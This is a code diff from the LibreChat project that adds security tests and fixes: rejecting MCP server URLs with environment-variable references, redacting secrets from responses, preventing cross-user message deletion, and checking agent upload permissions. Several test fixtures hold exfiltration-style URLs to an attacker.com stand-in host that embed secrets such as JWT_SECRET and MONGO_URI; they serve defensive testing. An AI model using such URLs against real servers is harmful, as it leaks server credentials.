'temp_server_name',
expect.objectContaining({
@ -1698,6 +1832,78 @@ describe('MCP Routes', () => {
expect(response.body.message).toBe('Invalid configuration');
});
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
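The three rejection tests above all hinge on spotting `${VAR}` placeholders in a user-supplied server URL before any server-side env interpolation could leak secrets. A minimal sketch of such a check (the helper name and regex are illustrative assumptions, not LibreChat's actual validator):

```javascript
// Reject any user-supplied MCP server URL that embeds an env-variable
// reference like ${JWT_SECRET}; names below are illustrative only.
const ENV_VAR_PATTERN = /\$\{[^}]*\}/;

function hasEnvVarReference(url) {
  return ENV_VAR_PATTERN.test(url);
}

console.log(hasEnvVarReference('http://attacker.com/?secret=${JWT_SECRET}')); // true
console.log(hasEnvVarReference('ws://attacker.com/?secret=${MONGO_URI}')); // true
console.log(hasEnvVarReference('https://mcp-server.example.com/sse')); // false
```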
it('should redact secrets from create response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Test Server',
};
mockRegistryInstance.addServer.mockResolvedValue({
serverName: 'test-server',
config: {
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
headers: { Authorization: 'Bearer leaked-token' },
},
});
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201);
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.headers).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_id).toBe('cid');
});
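The assertions above imply a redaction pass over the registry's config before it is serialized: whole header/env maps are dropped, while only the secret members of `apiKey` and `oauth` are stripped so non-sensitive identifiers survive. A hedged sketch of that shape (field choices mirror the tests; the real LibreChat helper may differ):

```javascript
// Illustrative redaction helper, not LibreChat's actual implementation.
function redactServerConfig(config) {
  // header/env maps can carry raw credentials, so they are dropped wholesale
  const { headers, oauth_headers, env, ...rest } = config;
  if (rest.apiKey) {
    const { key, ...apiKey } = rest.apiKey; // keep source/authorization_type
    rest.apiKey = apiKey;
  }
  if (rest.oauth) {
    const { client_secret, ...oauth } = rest.oauth; // keep client_id
    rest.oauth = oauth;
  }
  return rest;
}

const redacted = redactServerConfig({
  type: 'sse',
  apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
  oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
  headers: { Authorization: 'Bearer leaked-token' },
});
console.log(redacted.apiKey.key, redacted.headers, redacted.oauth.client_id); // undefined undefined cid
```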
it('should return 500 when registry throws error', async () => {
const validConfig = {
type: 'sse',
@ -1727,7 +1933,9 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers/test-server');
expect(response.status).toBe(200);
expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
expect(response.body.title).toBe('Test Server');
expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
'test-server',
'test-user-id',
@ -1743,6 +1951,29 @@ describe('MCP Routes', () => {
expect(response.body).toEqual({ message: 'MCP server not found' });
});
it('should redact secrets from get response', async () => {
mockRegistryInstance.getServerConfig.mockResolvedValue({
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Secret Server',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' },
oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
oauth_headers: { 'X-OAuth': 'secret-value' },
});
const response = await request(app).get('/api/mcp/servers/secret-server');
expect(response.status).toBe(200);
expect(response.body.title).toBe('Secret Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.oauth_headers).toBeUndefined();
});
it('should return 500 when registry throws error', async () => {
mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
@ -1769,7 +2000,9 @@ describe('MCP Routes', () => {
.send({ config: updatedConfig });
expect(response.status).toBe(200);
expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse');
expect(response.body.title).toBe('Updated Server');
expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
'test-server',
expect.objectContaining({
@ -1781,6 +2014,35 @@ describe('MCP Routes', () => {
);
});
it('should redact secrets from update response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Updated Server',
};
mockRegistryInstance.updateServer.mockResolvedValue({
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' },
oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' },
});
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({ config: validConfig });
expect(response.status).toBe(200);
expect(response.body.title).toBe('Updated Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.env).toBeUndefined();
});
it('should return 400 for invalid configuration', async () => {
const invalidConfig = {
type: 'sse',
@ -1797,6 +2059,51 @@ describe('MCP Routes', () => {
expect(response.body.errors).toBeDefined();
});
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should return 500 when registry throws error', async () => {
const validConfig = {
type: 'sse',


@ -0,0 +1,200 @@
const mongoose = require('mongoose');
const express = require('express');
const request = require('supertest');
const { v4: uuidv4 } = require('uuid');
const { MongoMemoryServer } = require('mongodb-memory-server');
jest.mock('@librechat/agents', () => ({
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({
unescapeLaTeX: jest.fn((x) => x),
countTokens: jest.fn().mockResolvedValue(10),
}));
jest.mock('@librechat/data-schemas', () => ({
...jest.requireActual('@librechat/data-schemas'),
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
}));
jest.mock('~/models', () => ({
saveConvo: jest.fn(),
getMessage: jest.fn(),
saveMessage: jest.fn(),
getMessages: jest.fn(),
updateMessage: jest.fn(),
deleteMessages: jest.fn(),
}));
jest.mock('~/server/services/Artifacts/update', () => ({
findAllArtifacts: jest.fn(),
replaceArtifactContent: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
requireJwtAuth: (req, res, next) => next(),
validateMessageReq: (req, res, next) => next(),
}));
jest.mock('~/models/Conversation', () => ({
getConvosQueried: jest.fn(),
}));
jest.mock('~/db/models', () => ({
Message: {
findOne: jest.fn(),
find: jest.fn(),
meiliSearch: jest.fn(),
},
}));
/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */
const { messageSchema } = require('@librechat/data-schemas');
describe('deleteMessages model-level IDOR prevention', () => {
let mongoServer;
let Message;
const ownerUserId = 'user-owner-111';
const attackerUserId = 'user-attacker-222';
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
Message = mongoose.models.Message || mongoose.model('Message', messageSchema);
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Message.deleteMany({});
});
it("should NOT delete another user's message when attacker supplies victim messageId", async () => {
const conversationId = uuidv4();
const victimMsgId = 'victim-msg-001';
await Message.create({
messageId: victimMsgId,
conversationId,
user: ownerUserId,
text: 'Sensitive owner data',
});
await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId });
const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean();
expect(victimMsg).not.toBeNull();
expect(victimMsg.user).toBe(ownerUserId);
expect(victimMsg.text).toBe('Sensitive owner data');
});
it("should delete the user's own message", async () => {
const conversationId = uuidv4();
const ownMsgId = 'own-msg-001';
await Message.create({
messageId: ownMsgId,
conversationId,
user: ownerUserId,
text: 'My message',
});
const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId });
expect(result.deletedCount).toBe(1);
const deleted = await Message.findOne({ messageId: ownMsgId }).lean();
expect(deleted).toBeNull();
});
it('should scope deletion by conversationId, messageId, and user together', async () => {
const convoA = uuidv4();
const convoB = uuidv4();
await Message.create([
{ messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' },
{ messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' },
]);
await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId });
const remaining = await Message.find({ user: ownerUserId }).lean();
expect(remaining).toHaveLength(2);
});
});
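The model-level tests above reduce to one filter shape: the requesting user's id is part of every delete filter, so a leaked `messageId` alone can never match another user's document. A toy in-memory stand-in for `Message.deleteMany` (names illustrative, not LibreChat's code) demonstrates the semantics:

```javascript
// Fake in-memory collection standing in for the Mongoose Message model,
// only to show the ownership-scoped filter semantics.
const store = [
  { messageId: 'victim-msg-001', conversationId: 'c1', user: 'user-owner-111' },
];

function deleteMany(filter) {
  const before = store.length;
  for (let i = store.length - 1; i >= 0; i--) {
    // every filter key must match, including `user`
    if (Object.keys(filter).every((k) => store[i][k] === filter[k])) {
      store.splice(i, 1);
    }
  }
  return { deletedCount: before - store.length };
}

// Attacker knows the victim's messageId but deletes as themselves: no match.
const attackerResult = deleteMany({ messageId: 'victim-msg-001', user: 'user-attacker-222' });
// The owner's own delete succeeds.
const ownerResult = deleteMany({ messageId: 'victim-msg-001', user: 'user-owner-111' });
console.log(attackerResult.deletedCount, ownerResult.deletedCount); // 0 1
```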
/* ─── Route-level tests: supertest + mocked deleteMessages ─── */
describe('DELETE /:conversationId/:messageId route handler', () => {
let app;
const { deleteMessages } = require('~/models');
const authenticatedUserId = 'user-owner-123';
beforeAll(() => {
const messagesRouter = require('../messages');
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: authenticatedUserId };
next();
});
app.use('/api/messages', messagesRouter);
});
beforeEach(() => {
jest.clearAllMocks();
});
it('should pass user and conversationId in the deleteMessages filter', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
await request(app).delete('/api/messages/convo-1/msg-1');
expect(deleteMessages).toHaveBeenCalledTimes(1);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-1',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 204 on successful deletion', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
const response = await request(app).delete('/api/messages/convo-1/msg-owned');
expect(response.status).toBe(204);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-owned',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 500 when deleteMessages throws', async () => {
deleteMessages.mockRejectedValue(new Error('DB failure'));
const response = await request(app).delete('/api/messages/convo-1/msg-1');
expect(response.status).toBe(500);
expect(response.body).toEqual({ error: 'Internal server error' });
});
});


@ -63,7 +63,7 @@ router.post(
resetPasswordController,
);
router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA);
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);


@ -1,7 +1,7 @@
const multer = require('multer');
const express = require('express');
const { sleep } = require('@librechat/agents');
const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas');
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
const {
@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => {
});
const { importIpLimiter, importUserLimiter } = createImportLimiters();
/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */
const { forkIpLimiter, forkUserLimiter } = createForkLimiters();
const importMaxFileSize = resolveImportMaxFileSize();
const upload = multer({
storage,
fileFilter: importFileFilter,
limits: { fileSize: importMaxFileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
/**
* Imports a conversation from a JSON file and saves it to the database.
@ -238,7 +257,7 @@ router.post(
importIpLimiter,
importUserLimiter,
configMiddleware,
handleUpload,
async (req, res) => {
try {
/* TODO: optimize to return imported conversations and add manually */
@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => {
}
});
router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => {
const { conversationId, title } = req.body;
try {


@ -2,12 +2,12 @@ const fs = require('fs').promises;
const express = require('express');
const { EnvVar } = require('@librechat/agents');
const { logger } = require('@librechat/data-schemas');
const { verifyAgentUploadPermission } = require('@librechat/api');
const {
Time,
isUUID,
CacheKeys,
FileSources,
SystemRoles,
ResourceType,
EModelEndpoint,
PermissionBits,
@ -381,48 +381,15 @@ router.post('/', async (req, res) => {
return await processFileUpload({ req, res, metadata });
}
const denied = await verifyAgentUploadPermission({
req,
res,
metadata,
getAgent,
checkPermission,
});
if (denied) {
return;
}
/**
* Check agent permissions for permanent agent file uploads (not message attachments).
* Message attachments (message_file=true) are temporary files for a single conversation
* and should be allowed for users who can chat with the agent.
* Permanent file uploads to tool_resources require EDIT permission.
*/
const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true';
if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) {
const userId = req.user.id;
/** Admin users bypass permission checks */
if (req.user.role !== SystemRoles.ADMIN) {
const agent = await getAgent({ id: metadata.agent_id });
if (!agent) {
return res.status(404).json({
error: 'Not Found',
message: 'Agent not found',
});
}
/** Check if user is the author or has edit permission */
if (agent.author.toString() !== userId) {
const hasEditPermission = await checkPermission({
userId,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.EDIT,
});
if (!hasEditPermission) {
logger.warn(
`[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`,
);
return res.status(403).json({
error: 'Forbidden',
message: 'Insufficient permissions to upload files to this agent',
});
}
}
}
}
return await processAgentFileUpload({ req, res, metadata });


@ -0,0 +1,376 @@
const express = require('express');
const request = require('supertest');
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { createMethods } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const {
SystemRoles,
AccessRoleIds,
ResourceType,
PrincipalType,
} = require('librechat-data-provider');
const { createAgent } = require('~/models/Agent');
jest.mock('~/server/services/Files/process', () => ({
processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' });
}),
processImageFile: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Image processed' });
}),
filterFile: jest.fn(),
}));
jest.mock('fs', () => {
const actualFs = jest.requireActual('fs');
return {
...actualFs,
promises: {
...actualFs.promises,
unlink: jest.fn().mockResolvedValue(undefined),
},
};
});
const fs = require('fs');
const { processAgentFileUpload } = require('~/server/services/Files/process');
const router = require('~/server/routes/files/images');
describe('POST /images - Agent Upload Permission Check (Integration)', () => {
let mongoServer;
let authorId;
let otherUserId;
let agentCustomId;
let User;
let Agent;
let AclEntry;
let methods;
let modelsToCleanup = [];
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
const { createModels } = require('@librechat/data-schemas');
const models = createModels(mongoose);
modelsToCleanup = Object.keys(models);
Object.assign(mongoose.models, models);
methods = createMethods(mongoose);
User = models.User;
Agent = models.Agent;
AclEntry = models.AclEntry;
await methods.seedDefaultRoles();
});
afterAll(async () => {
const collections = mongoose.connection.collections;
for (const key in collections) {
await collections[key].deleteMany({});
}
for (const modelName of modelsToCleanup) {
if (mongoose.models[modelName]) {
delete mongoose.models[modelName];
}
}
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
await User.deleteMany({});
await AclEntry.deleteMany({});
authorId = new mongoose.Types.ObjectId();
otherUserId = new mongoose.Types.ObjectId();
agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`;
await User.create({ _id: authorId, username: 'author', email: 'author@test.com' });
await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' });
jest.clearAllMocks();
});
const createAppWithUser = (userId, userRole = SystemRoles.USER) => {
const app = express();
app.use(express.json());
app.use((req, _res, next) => {
if (req.method === 'POST') {
req.file = {
originalname: 'test.png',
mimetype: 'image/png',
size: 100,
path: '/tmp/t.png',
filename: 'test.png',
};
req.file_id = uuidv4();
}
next();
});
app.use((req, _res, next) => {
req.user = { id: userId.toString(), role: userRole };
req.app = { locals: {} };
req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } };
next();
});
app.use('/images', router);
return app;
};
it('should return 403 when user has no permission on agent', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow upload for agent owner', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(authorId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for admin regardless of ownership', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId, SystemRoles.ADMIN);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for user with EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_EDITOR,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload for user with only VIEW permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
});
it('should return 404 for non-existent agent', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: 'agent_nonexistent123456789',
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(404);
expect(response.body.error).toBe('Not Found');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow message_file attachment (boolean true) without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: true,
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow message_file attachment (string "true") without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: 'true',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload when message_file is false (not a message attachment)', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: false,
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
});


@@ -2,12 +2,15 @@ const path = require('path');
 const fs = require('fs').promises;
 const express = require('express');
 const { logger } = require('@librechat/data-schemas');
+const { verifyAgentUploadPermission } = require('@librechat/api');
 const { isAssistantsEndpoint } = require('librechat-data-provider');
 const {
   processAgentFileUpload,
   processImageFile,
   filterFile,
 } = require('~/server/services/Files/process');
+const { checkPermission } = require('~/server/services/PermissionService');
+const { getAgent } = require('~/models/Agent');

 const router = express.Router();
@@ -22,6 +25,16 @@ router.post('/', async (req, res) => {
     metadata.file_id = req.file_id;

     if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
+      const denied = await verifyAgentUploadPermission({
+        req,
+        res,
+        metadata,
+        getAgent,
+        checkPermission,
+      });
+      if (denied) {
+        return;
+      }
       return await processAgentFileUpload({ req, res, metadata });
     }


@@ -13,6 +13,7 @@ const {
   MCPOAuthHandler,
   MCPTokenStorage,
   setOAuthSession,
+  PENDING_STALE_MS,
   getUserMCPAuthMap,
   validateOAuthCsrf,
   OAUTH_CSRF_COOKIE,
@@ -49,6 +50,18 @@ const router = Router();

 const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';

+const checkMCPUsePermissions = generateCheckAccess({
+  permissionType: PermissionTypes.MCP_SERVERS,
+  permissions: [Permissions.USE],
+  getRoleByName,
+});
+
+const checkMCPCreate = generateCheckAccess({
+  permissionType: PermissionTypes.MCP_SERVERS,
+  permissions: [Permissions.USE, Permissions.CREATE],
+  getRoleByName,
+});
+
 /**
  * Get all MCP tools available to the user
  * Returns only MCP tools, completely decoupled from regular LibreChat tools
@@ -91,7 +104,11 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
     }

     const oauthHeaders = await getOAuthHeaders(serverName, userId);
-    const { authorizationUrl, flowId: oauthFlowId } = await MCPOAuthHandler.initiateOAuthFlow(
+    const {
+      authorizationUrl,
+      flowId: oauthFlowId,
+      flowMetadata,
+    } = await MCPOAuthHandler.initiateOAuthFlow(
       serverName,
       serverUrl,
       userId,
@@ -101,6 +118,7 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
     logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });

+    await MCPOAuthHandler.storeStateMapping(flowMetadata.state, oauthFlowId, flowManager);
     setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
     res.redirect(authorizationUrl);
   } catch (error) {
@@ -143,31 +161,53 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
       return res.redirect(`${basePath}/oauth/error?error=missing_state`);
     }

-    const flowId = state;
-    logger.debug('[MCP OAuth] Using flow ID from state', { flowId });
+    const flowsCache = getLogStores(CacheKeys.FLOWS);
+    const flowManager = getFlowStateManager(flowsCache);
+    const flowId = await MCPOAuthHandler.resolveStateToFlowId(state, flowManager);
+    if (!flowId) {
+      logger.error('[MCP OAuth] Could not resolve state to flow ID', { state });
+      return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
+    }
+    logger.debug('[MCP OAuth] Resolved flow ID from state', { flowId });

     const flowParts = flowId.split(':');
     if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
-      logger.error('[MCP OAuth] Invalid flow ID format in state', { flowId });
+      logger.error('[MCP OAuth] Invalid flow ID format', { flowId });
       return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
     }
     const [flowUserId] = flowParts;

-    if (
-      !validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH) &&
-      !validateOAuthSession(req, flowUserId)
-    ) {
-      logger.error('[MCP OAuth] CSRF validation failed: no valid CSRF or session cookie', {
+    const hasCsrf = validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH);
+    const hasSession = !hasCsrf && validateOAuthSession(req, flowUserId);
+    let hasActiveFlow = false;
+    if (!hasCsrf && !hasSession) {
+      const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
+      const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
+      hasActiveFlow = pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS;
+      if (hasActiveFlow) {
+        logger.debug(
+          '[MCP OAuth] CSRF/session cookies absent, validating via active PENDING flow',
+          {
+            flowId,
+          },
+        );
+      }
+    }
+
+    if (!hasCsrf && !hasSession && !hasActiveFlow) {
+      logger.error(
+        '[MCP OAuth] CSRF validation failed: no valid CSRF cookie, session cookie, or active flow',
+        {
           flowId,
           hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
           hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
-      });
+        },
+      );
       return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
     }

-    const flowsCache = getLogStores(CacheKeys.FLOWS);
-    const flowManager = getFlowStateManager(flowsCache);
     logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
     const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
